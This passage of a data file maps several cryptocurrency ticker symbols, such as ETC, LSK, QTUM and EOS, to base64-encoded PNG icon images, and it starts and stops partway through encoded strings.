QF2Jc1csLGq4tQVgaLfIDGfNyUu72K1fHDCOJbx29W9KJju08fGGmASJEMF0/WB8AwEktFO4TwiwoabjQGsfA2I/dVXeGzmbIoMI8O0SLqSJHHOwIO+HqP5xhXl8sG/4OahHXBmT15Te/PaJtlNBOrJls/reHXGFLa49O2OvvzpfVKkhcuaSkkl58QUwmH4EOitVoZ/tcUjv8iH/Le+xNzH82EEqRhok2Fo5tA1ldE3kxWLFJeawbPzn1F1i1Wu/WpPzorNmzeHjlZHgGnTcgyMc+kKJU0a7kw4DBexrhkuvPPhPSSueB15xNzX00MRozzRWkgG3jk3EPD3MJtjjDI2Ow/tQF9K7HwKcEhYa0s7QyBAIRF1Gm4kpNP/IiJisQC1dxzYcAhY6HZDoziPJlQT4IYO/31yD9xfXzhFlcr6j4SYaGkmAH1B4iBsDeRaLAwXAQBk7E6z11yKinGRYcr5EOrDdw18G5z7O1vEWbwnjqaIgOkqfzL3nKwCb+5SJLI9utCuQJCckpjMRt9B+Bh0Q+NdTQ2IBBrElhCAeXP8tWSqq72TyoIOmslyJKNmhHT09MWZGl2tdyhtSn8URtgjDApmgZ4u1lZbCSdQLVRDAP64zXePvq+fr7KRd9G1Rs6pWNGI/HVPn7CBS3u3os/nhWKLMHNsTg7/EQAUC/e2Ncme6itawoKnLwsVAQBu6tMUHT4z0zj/ygcR+LqOGzaHBbpOk2aChBblit7FnNUKNHfIeG+7ikk5ubh+uARlW9+klueFxe4YMXwi5+0NN0CVUzdz4Q/NCJjZru+ny5NcDknz6ctPNWSiILuZJSXHEMKA6ViwFrVhjQD8QQUb96TgSLmK5I5G0IHA7aqLaL55GTFp2YhJTB1Ih0DfH0lGB87QVf3irk1Sz42r28+V7TtAi/JgnMWTo7DQPrWkpNLz01UTvZJi7IzaIs3Jj4Ur2kKNIYDeoIy6Zhs+Ku3Bpv3d+FZOCvx5MyHFRkMKaOjdvROeIPCjNz7AtEVF1IiofQrDdEIsNjsBvMq3rpzP0h978omr5cdP0hJVTr9wt7guS0p6e4Ad4y+cWY/i9cZLF1ySZdnv8fwEwO4CGql7/91Mewpm/G4teidNgs0ZRWYok0TWuXQJphw5jk/ffBmOmHjkzn0GasBPQaBUEoy6fxyTVLqY3njl2JmiIpM7JfQ/IurByFy8MJcdPlZp+UNxZPQT83nP7XpWc6sB2l3qeFYFqWlJpJSJYBydAHFBiDFYKNSdxKXR9/HfYN93CoW7z8JqjwKjztbdelf7ZOlUxZqRs/ZG/Y0NJmGqZeF0UMShlusOH6slVDuMA4fQ3XlfZ8nJyFswF9OKfoCxzy9GYNYsBKOjqZFSKLSBvw2iAYkRDIJTK458cRmqe5rQcusaVT5VLBH7+lip0krFl+p+7q9iooygi+fwlkNWwKOeeqpKOnl6Fc/NtrOMdG709tK1S0HUCaNwKhiTowc6nwBBEZApLX6rivS+MXzc9DmsqeayXrpuhZQ29Tvryr8sPe2mdNcTKPJFRT5UDDcteo4erTOSEt7h728Cb+/QYTNZ9Dt8mOMhNgQHuo4zMgmowbRAn37h0w2KDfhn0Yt/2ipUywbYi/fhAEKL9p/94i2j7X6Fvv+gQvex/gBbsfuhQtEhDD5FgjMxlVefPCCf+aKEj5u/eE1x8XdFzkTUxfk0ZXgKQvOtZWVafEFBOdXCKmRPUKTsTANBlagJht8gZNqgootvaoO9ql6vPLJNcmre9dU117a7+0Nv5n7QwkgAuFCuaGi4Gzsxp5Xt3vd9zJ5lSMnJDOooIAbqwzh5Vr27baPFiGD765q7XiaHrD6M+WgAQMrmqehs7yiPS060YednBSiYZ0iJLjZiJESR2uk+aGpWtdd/Y2HpaZeVtAlL2hsbqT2Z6Q6FfhDAAzUwuDDwFCDYzaZ764xI+/vG6p/L+vVaA3Y7HQmyNXj+hbL4P2Cni8zrVfUtH1no67qUMu65mjNnumlVRFrYekBGSkG4opn0TlX7PMYZFcM+25+PvMmQx6cJg5LZiERdEChiruvvbrTop89XqYsWLbp94sRd0hE+huQ93PijABD6ZqQ6A8EvYrMm+PiuPd/jTofE0sdrzOEQ7g294pKkr/mlZDTc2ceWL19Sv3dvG+37RufhQB7lXUTCBJI1a8azmYAnN382n7j+1zx35Y95FiUkMymhOMzQo5IL2/IIr246HUItu7DQRU630GikUZb1+Kx5YdtHq60w1f/tdfAWRUrxavp7FxLB2qyZ0Mz/8UWwDGcqnP/X8m/m3XSRMblV6wAAAABJRU5ErkJggg==',
'ETC': 'iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAAXNSR0IArs4c6QAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAACXBIWXMAABYlAAAWJQFJUiTwAAABWWlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iWE1QIENvcmUgNS40LjAiPgogICA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgogICAgICA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgogICAgICAgICAgICB4bWxuczp0aWZmPSJodHRwOi8vbnMuYWRvYmUuY29tL3RpZmYvMS4wLyI+CiAgICAgICAgIDx0aWZmOk9yaWVudGF0aW9uPjE8L3RpZmY6T3JpZW50YXRpb24+CiAgICAgIDwvcmRmOkRlc2NyaXB0aW9uPgogICA8L3JkZjpSREY+CjwveDp4bXBtZXRhPgpMwidZAAAGyUlEQVRYCa1Xa2gUVxSex53ZzUtrYxRbC5b+8FGlRbQ1FUVUxP6QUsoqYn0U4ybRXR+4iVorTqRokxgfeZhdtbZSKq2pUNpSEEkNAVttsD9aDLUFFWtBrdEYzWNn5t7b74zZEDbZuAFvGPbOnXPPd853HvdGkVKq6T6WZWkkG4zFDAWjqKbkvfV1kSU0t85bjL4lZNLVqdLmYQ2pqPiTAWt9dm5u9lVFlY/+vJc1tcmyXOghfXI4+rThCJOsVWbp9Jubl72PMf0FnbGJk/K6dnrfrCffaJ7uGBYDgdOn9YalS/m66shCpuvnuO0K+KxpuhZXuXyjfvP+3ykEeMSzN6CX+iVWMPPF0SNbNFWb4jqukIqUps+nc8EboxsqFlLsMdIOQ9ohSFA/Pm9kmWGaU1zbpZhrSAjd7olzxtiCwprSIgIHA+yZMhA4HQD1Dby4umSO1NRm7rrkJqWbF0JiQdM0VdW0NgTl9eMbK26lG4p0GFAJPGAFTIDXAAaoqkiAk6d4VyWXLjNYLtOVClq7MuVKWvn1VAPgyZOsHz1ht2Ear/VSr5PXeHjvQ1wwuysudE1bXlQbeZeMnpdGKIa0MkH9htodb8LBnznn5L8gaB1lwHzoR0g3N+4ogguXAoJ1hqVrbY/bpzdsP/oQdnoEESuDDc+7wT5gTW1taBVkhL9zxBnEfLxEqjOfyQyfoUkhbsP/Oin5RchOMjN8WZQK3HHjhs/M8zHTf/nHC2ctVWVNTU0pyzJlCBLUj7o7YRsUzkSCKcw0mBC8xXacEDe0SfWhiu31GypLhCkmuj32TjDzNwzxCQE8KTYVV5fOgh6XnEjhJJE2cCSoLz5SOosZxi+guBOSP6DoP42FKs7RjjUHNz/nZ0YQSIYw9dqjheUPAabdzet+HxlaYPrMOU7cvnqv6fqrDQ0N3EtatPBktMEMoDWv148eM+KEIsS/0rEPR7ccukGbg7Ul01EJHyhCCTCTjSVhx3bvoCOc4tKJHgsd+IvkCg5G5ht+tktw3hgLVX5MxuEZEIqUBqw9sOX57niPPLWj/gFZv/5I6XvIvQIpxUIDnc/psRWkBFdxmKIVM8NvIhntbkVTvhNSHImFqprJkMLqrVPi93OufW5ZPfSePAYzgGToWFVvj3XGSTu+CgArNaZPJmEbwDAInUjqlN4kTCUJQziVInJAQSKSzU1YrBn3X+a3g3lO+2gMSEII05q8mf3gLUU4v+XkjtwLzyfb3XEH4ATi1XwCnJR4c4DTN8i53OEuGuO8rJysM3fyun8tqAy9THK9umnaN1IyAAlJ9Kmavh0OrsSxqzjxOAcc7RlgeK/G3sPJ1LnriX7lcr7/+Kaqy32ISZNUimSkMpIV21jVGg1VrBJCnY8m1Gj4fTrarUYhgJ6+hKIQ0BqakOaDDBeyGYfFIuxdTuCbUTFJuH2vg51a5KHs6OyQwcMRy/DpP9UVlZ/H2vn1dSXLhFR3+rL801BiinCfdD9cCNB2TObYzlV4vg/AJwkhHPvoFbunp+iR012L13YveEmlOGiDoFhVWVX2zHfmPtQU7fsZb+e/NH1+fkt08/6W/MXTT9hCeYD7wDRk/kgdjKAB3YMxe9u0x2tPhg61BGPBzBmLF0RA0ilw89mxLYeaqbe0Tm3tY40MpJEqByhhGB63sLpkVfaonJOd7Y/+EapSfjRUWUcbV1ZGxuRkariKqRk2l3voCKb1orrSFfB0G/ZMe3S/oyYWrtyYuEnR9+SR0gASTGwsri2NmX5fEBQj2uKiK7h1LFx1tr+ywtqtc3E7241wzNcNncr10v3mG7OH6oK0f0gDQC3OIFWuqA6PyNH8l5B2k+hMoDqQivgal6EPuSNdTZd7YNlqXQewbUsciF2o1/yj4fI/Em29v7H956mqwJMhcGLhy401HUAsIHNdF0WOyygzzGVS8EsAb8E9YTWOY4nEjPsz/Cra4zYCpzDSvaA/YPJ8SANImG7BpCgarryAk32XPzODElf0dHVzKeRoHMtjaI4118z0+xzH/YbyBHuo91O5DjmeagDthiJO4aBDBXnQaGSYDN0P6YBVgcJEUNADDNySb3Z2d2wYEjHpY1oGYI8sKyvz8sWVYp1weRsuodRD0JapsD0b8KYGvyiJ3oXBVEEDSi4J23tN1wBiQZDi4+H91+F0WDe9HoZcVDjCgn8ExCfRcPlZksHzVOoTxgxZBQmh/r/9SxO0B6nno9lcjLZVzFYsrz2TzgEXj/46+s/TZiCx6XQg4FF76177Ftd1rwKJ44xcQ+C9V6+0wRM6h/3bC6QEq0sWFVVHCkkBUT9sRdjwP9bZqr/FHzrfAAAAAElFTkSuQmCC',
'LSK': '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',
'QTUM': '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',
'EOS': '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